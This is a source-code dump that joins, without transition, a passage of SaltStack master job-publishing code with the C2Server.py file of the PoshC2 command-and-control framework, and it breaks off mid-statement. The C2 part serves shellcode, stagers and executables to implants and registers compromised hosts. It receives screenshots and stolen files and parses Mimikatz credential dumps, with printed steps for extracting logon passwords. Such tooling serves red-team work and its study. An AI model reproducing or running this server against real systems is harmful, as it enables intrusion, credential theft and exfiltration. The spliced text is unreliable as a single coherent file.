# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token. The clear load needs to
contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions; it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra:
log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username'])
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
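# Illustrative examples of the mapping above (an assumption, not upstream
# code):
#
#   {'token': '<token-id>', ...}            -> ('token', 'TokenAuthenticationError', None, ['token'])
#   {'eauth': 'pam', 'username': 'u', ...}  -> ('eauth', 'EauthAuthenticationError', None, ['username', 'password'])
#   anything else (CLI as the master user)  -> ('user', 'UserAuthenticationError', self.key, [])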
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if a master id was specified, let's put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
class FloMWorker(MWorker):
'''
Change the run and bind to be ioflo friendly
'''
def __init__(self,
opts,
key,
):
MWorker.__init__(self, opts, key)
def setup(self):
'''
Prepare the needed objects and socket for iteration within ioflo
'''
salt.utils.crypt.appendproctitle(self.__class__.__name__)
self.clear_funcs = salt.master.ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('ZMQ Worker binding to socket %s', self.w_uri)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.socket.connect(self.w_uri)
def handle_request(self):
'''
Handle a single request
'''
try:
polled = self.poller.poll(1)
if polled:
package = self.socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
self.socket.send(ret)
except KeyboardInterrupt:
raise
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
return
|
C2Server.py
|
#!/usr/bin/env python3
import os, sys, datetime, time, base64, logging, signal, re, ssl, traceback, threading
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from urllib.parse import urlparse
from poshc2.server.Implant import Implant
from poshc2.server.Tasks import newTask
from poshc2.server.Core import decrypt, encrypt, default_response, decrypt_bytes_gzip, number_of_days, process_mimikatz, print_bad
from poshc2.Colours import Colours
from poshc2.server.database.DBSQLite import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all, get_sharpurls
from poshc2.server.database.DBSQLite import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey, get_c2_messages, database_connect
from poshc2.server.Payloads import Payloads
from poshc2.server.Config import PoshProjectDirectory, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, PayloadCommsHost, SocksHost
from poshc2.server.Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, PayloadCommsPort, urlConfig, BindIP, BindPort, ReportsDirectory
from poshc2.server.Config import DownloadURI, Sounds, ClockworkSMS_APIKEY, ClockworkSMS_MobileNumbers, URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken
from poshc2.server.Config import Pushover_APIUser, EnableNotifications
from poshc2.server.Cert import create_self_signed_cert
from poshc2.client.Help import logopic
from poshc2.Utils import validate_sleep_time, randomuri, gen_key
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
KEY = None
class MyHandler(BaseHTTPRequestHandler):
def signal_handler(self, signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def log_message(self, format, *args):
try:
useragent = str(self.headers['user-agent'])
except Exception:
useragent = "None"
open("%swebserver.log" % PoshProjectDirectory, "a").write("%s - [%s] %s %s\n" %
(self.address_string(), self.log_date_time_string(), format % args, useragent))
def do_HEAD(self):
"""Respond to a HEAD request."""
self.server_version = ServerHeader
self.sys_version = ""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_OPTIONS(self):
"""Respond to a HEAD request."""
self.server_version = ServerHeader
self.sys_version = ""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_PUT(self):
"""Respond to a PUT request."""
self.server_version = ServerHeader
self.sys_version = ""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers))
new_implant_url = get_newimplanturl()
self.cookieHeader = self.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
self.server_version = ServerHeader
self.sys_version = ""
if not self.cookieHeader:
self.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(self.path)
if new_task:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except HTTPError as e:
self.send_response(e.code)
self.send_header("Content-type", "text/html")
self.send_header("Connection", "close")
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in self.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in self.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in self.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in self.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in self.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in self.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in self.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in self.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
self.send_response(200)
self.send_header("Content-type", "application/x-msdownload")
self.end_headers()
self.wfile.write(content)
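# Each QuickCommand branch above serves a pre-generated payload straight from
# PayloadsDirectory: the bat/SCT/XML stagers verbatim, the shellcode blobs
# base64-encoded, the Python dropper hex-encoded with a leading 'a', and the
# EXEs as application/x-msdownload.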
# register new implant
elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if self.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if self.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if self.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if self.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if self.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if self.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if self.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if self.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.SharpCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
else:
try:
cookieVal = (self.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
self.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
self.wfile.write(bytes(HTTPResponse, "utf-8"))
def do_POST(self):
"""Respond to a POST request."""
try:
self.server_version = ServerHeader
self.sys_version = ""
try:
content_length = int(self.headers['Content-Length'])
except:
content_length = 0
self.cookieHeader = self.headers.get('Cookie')
try:
cookieVal = (self.cookieHeader).replace("SessionID=", "")
except:
cookieVal = ""
post_data = self.rfile.read(content_length)
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(self.path), str(self.headers), post_data)
now = datetime.datetime.now()
result = get_implants_all()
if not result:
print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")
return
for i in result:
implantID = i[0]
RandomURI = i[1]
Hostname = i[3]
encKey = i[5]
Domain = i[11]
User = i[2]
if RandomURI in self.path and cookieVal:
update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
executedCmd = get_cmd_from_task_id(taskId)
task_owner = get_task_owner(taskId)
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if "loadmodule" in executedCmd:
print("Module loaded successfully")
update_task(taskId, "Module loaded successfully")
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-files ", "")
filename = filename.replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.replace("\\", "/")
directory, filename = filename.rsplit('/', 1)
filename = filename.rstrip('\x00')
original_filename = filename.strip()
if not original_filename:
directory = directory.rstrip('\x00')
directory = directory.replace("/", "_").replace("\\", "_").strip()
original_filename = directory
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
chunkNumber = rawoutput[:5].decode("utf-8")
totalChunks = rawoutput[5:10].decode("utf-8")
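# Chunked download wire format (as parsed above): bytes 0-4 hold the
# zero-padded chunk number, bytes 5-9 the total number of chunks, and
# everything from byte 10 onward is raw file content appended to the
# output file further down.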
if (chunkNumber == "00001") and os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
counter = 1
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if (chunkNumber != "00001"):
counter = 1
if not os.path.isfile('%s%s' % (DownloadsDirectory, filename)):
print("Error trying to download part of a file to a file that does not exist: %s" % filename)
while(os.path.isfile('%s%s' % (DownloadsDirectory, filename))):
# First find the 'next' file would be downloaded to
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter)
counter += 1
if counter != 2:
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if '.' in filename:
filename = original_filename[:original_filename.rfind('.')] + '-' + str(counter - 2) + original_filename[original_filename.rfind('.'):]
else:
filename = original_filename + '-' + str(counter - 2)
else:
filename = original_filename
print("Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
update_task(taskId, "Download file part %s of %s to: %s" % (chunkNumber, totalChunks, filename))
output_file = open('%s%s' % (DownloadsDirectory, filename), 'ab')
try:
output_file.write(rawoutput[10:])
except Exception:
output_file.write(rawoutput[10:].encode("utf-8"))
output_file.close()
except Exception as e:
update_task(taskId, "Error downloading file %s " % e)
print("Error downloading file %s " % e)
traceback.print_exc()
elif "safetydump" in executedCmd.lower():
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if rawoutput.startswith("[-]") or rawoutput.startswith("ErrorCmd"):
update_task(taskId, rawoutput)
print(rawoutput)
else:
dumpname = "SafetyDump-Task-%s.b64" % taskIdStr
dumppath = "%s%s" % (DownloadsDirectory, dumpname)
open(dumppath, 'w').write(rawoutput)
message = "Dump written to: %s" % dumppath
message = message + "\n The base64 blob needs decoding on Windows and then Mimikatz can be run against it."
message = message + "\n E.g:"
message = message + "\n $filename = '.\\%s'" % dumpname
message = message + "\n $b64 = Get-Content $filename"
message = message + "\n $bytes = [System.Convert]::FromBase64String($b64)"
message = message + "\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + 'safetydump.dmp', $bytes)"
message = message + "\n ./mimikatz.exe"
message = message + "\n sekurlsa::minidump safetydump.dmp"
message = message + "\n sekurlsa::logonpasswords"
update_task(taskId, message)
print(message)
elif (executedCmd.lower().startswith("run-exe safetykatz") or executedCmd.lower().startswith("invoke-mimikatz") or executedCmd.lower().startswith("pbind-command")) and "logonpasswords" in outputParsed.lower():
print("Parsing Mimikatz Output")
process_mimikatz(outputParsed)
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
else:
update_task(taskId, outputParsed)
print(Colours.GREEN)
print(outputParsed + Colours.END)
except Exception as e:
print(Colours.RED + "Unknown error!" + Colours.END)
print(e)
traceback.print_exc()
finally:
try:
UriPath = str(self.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
if [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % PoshProjectDirectory, "a").write("[+] Making POST connection to SharpSocks %s%s\r\n" % (SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Cookie': '%s' % self.cookieHeader, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'})
res = urlopen(r, post_data)
sharpout = res.read()
self.send_response(res.getcode())
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", len(sharpout))
self.end_headers()
if (len(sharpout) > 0):
self.wfile.write(sharpout)
except URLError as e:
try:
self.send_response(res.getcode())
except:
self.send_response(500)
self.send_header("Content-type", "text/html")
try:
self.send_header("Content-Length", len(sharpout))
except:
self.send_header("Content-Length", 0)
self.end_headers()
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] URLError with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
# res/sharpout may be undefined if the SharpSocks request itself failed,
# so guard them the same way the URLError handler above does
try:
self.send_response(res.getcode())
except Exception:
self.send_response(500)
self.send_header("Content-type", "text/html")
try:
